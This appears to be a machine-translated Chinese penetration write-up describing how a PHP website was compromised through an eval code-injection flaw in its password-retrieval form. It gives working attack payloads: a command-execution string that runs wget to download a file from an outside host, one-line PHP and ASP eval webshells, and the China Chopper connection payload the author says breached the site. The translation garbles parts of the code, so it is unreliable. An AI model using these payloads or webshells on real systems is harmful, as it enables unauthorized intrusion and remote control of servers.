0x1: Information Network collectionThe curl header can be used for reference based on the penetration experience of the small series. The header can be obtained as follows: here, the centos installation curl yum install curl is automatically installed. Use the curl-I url Command to check the server information. Here, we can see that the web application service architecture is ubuntu php apache. the web program is php ip Lookup: www.2cto.com ip Address: ip address is used in this forum for the sake of customer security prevention. For example, port collection can be scanned using tools such as nmap, Which is omitted here.0x2: vulnerability discoveryFor vulnerability scanning, if you use wvs burpsuite and so on, if the website has little content and is php, it is recommended that you use wvs. During multiple scans, we found a code execution vulnerability at the member's password retrieval. According to the habits of xiaobian, we usually use burpsuite for the packet capture and distribution tool, because burpsuite is excellent in all tools, open the IE setting proxy and cut the packet and modify the package. You can see that a string of md5 values have been confirmed to be actually executed. You can use $ {@ {print 'id' }}$ {@ {print 'wget-O test. pho http://www.xinyuse.org/xx.txt'character character here. The quotation mark is ', which is a reverse quotation mark. Perform various command operations. Unfortunately, although the commands can be successfully executed in this test, the creation and modification of the webshell failed to be uploaded.0x3: Kitchen Knife breakthroughTake a closer look at vulnerability formation 01 // verify user input data 02 function validate () 03 {04 $ arrErrorMsg = array (); // prompt message 05 $ errorMsgNo = 0; // prompt message No. 06 $ isize = count ($ this-> arrCheckData)/4; // check the number of lines 07 08 // check the data in sequence 09 for ($ I = 0; $ I <$ isize; $ I ++) 10 {11 $ fieldId = $ this-> arrCheckData [$ I * 4]; // form field Id 12 $ fields = explode (",", $ this-> arrCheckData [$ I * 4 + 1]); // related form field Id 13 $ method = $ this-> arrCheckData [$ I * 4 + 2]; // check method 14 $ msg = $ this-> arr CheckData [$ I * 4 + 3]; // The error code returned when the verification fails: 15 16 $ fieldsNum = count ($ fields)-1; // number of related form fields 17 for ($ j = $ fieldsNum; $ j >=0; $ j --) 18 {19 $ field = $ fields [$ j]; // related form field 20 $ rdata = "data"; 21 if ($ j> 0) 22 {23 $ rdata. = $ j; 24} 25 26 $ method = str_replace ($ rdata ,"\"". addslashes ($ _ REQUEST [$ field]). "\" ", $ method); 27} 28 29 if (substr ($ method, 0, 1) = "! ") 30 {31 $ method = substr ($ method, 1); 32 eval (" \ $ B =! \ $ This-> $ method; "); 33} 34 else35 {36 eval (" \ $ B =\$ this-> $ method ;"); 37} vulnerability formation is caused by eval: Obtaining values from the form and then using addslashes for filtering. Unfortunately, the vulnerability is not filtered at all, you can directly write shell code During code execution, but it is more convenient to use a kitchen knife to write a piece of code locally for testing.0x4 Local Test1 2 <? Php 3 error_reporting (E_ALL &~ E_NOTICE); 4 $ str = "fuck you webshell $ _ POST [cmd]"; 5 eval ("\ $ str = \" $ str \";"); 6 7?> 8. The code is successfully executed. 0x5 kitchen knife Connection Analysis: in general, we use our one-sentence Trojan Horse to write this, so we can directly use the kitchen knife for direct connection. However, the scenario here is that one is required for a post submission. <? Php @ eval ($ _ POST [cmd]);?> Taking this into account, we have to say that the kitchen knife is a powerful website management tool. You can see 01 B in the kitchen knife manual.) Other aspects: 02 ----------------------------------------------------------------------------- 03 add additional Additional submitted data, such as ASP's new Server: 04 <% 05 Set o = Server. createObject ("ScriptControl") 06 o. language = "vbscript" 07 o. addcode (Request ("SC") 08 o. run "ff", Server, Response, Request, Application, Session, Error 09%> 10, enter: 11 <O> SC = function + ff (Serve R, Response, Request, Application, Session, Error): eval (request ("pass"): end + function </O> 12 and connect with the password pass. Use <o> </o> to construct a data packet: the value obtained after multiple tests is 1 cmd =$ {@ eval ($ _ POST [moon])}. moon =$ {@ phpinfo ()} The connection to the kitchen knife successfully penetrated the target website:
0x5 SummaryThis penetration took a total of two days, from discovery to breakthrough is not a good trip, more or less there will be obstruction. The next sentence: It is important to learn to use existing knowledge.